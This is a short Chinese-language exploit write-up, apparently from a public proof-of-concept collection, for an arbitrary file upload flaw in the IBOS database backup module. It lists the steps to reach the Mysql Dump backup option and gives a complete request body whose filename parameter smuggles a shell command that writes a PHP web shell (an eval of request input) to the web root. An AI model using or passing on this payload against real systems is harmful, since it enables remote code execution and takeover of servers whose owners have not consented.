IBOS 數據庫模塊 任意文件上傳漏洞

漏洞利用

登錄頁面如下

http://xxx.xxx.xxx.xxx/?r=dashboard/default/login

找到数据库备份模块，啓用更多選項，備份方式選擇Mysql Dump 提交并抓包

修改filename參數發送包會上傳peiqi.php文件到根目錄

backuptype=all&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=peiqi%26echo "<?php eval($_REQUEST[peiqi]);?>">peiqi%PATHEXT:~0,1%php%26peiqi&dbSubmit=1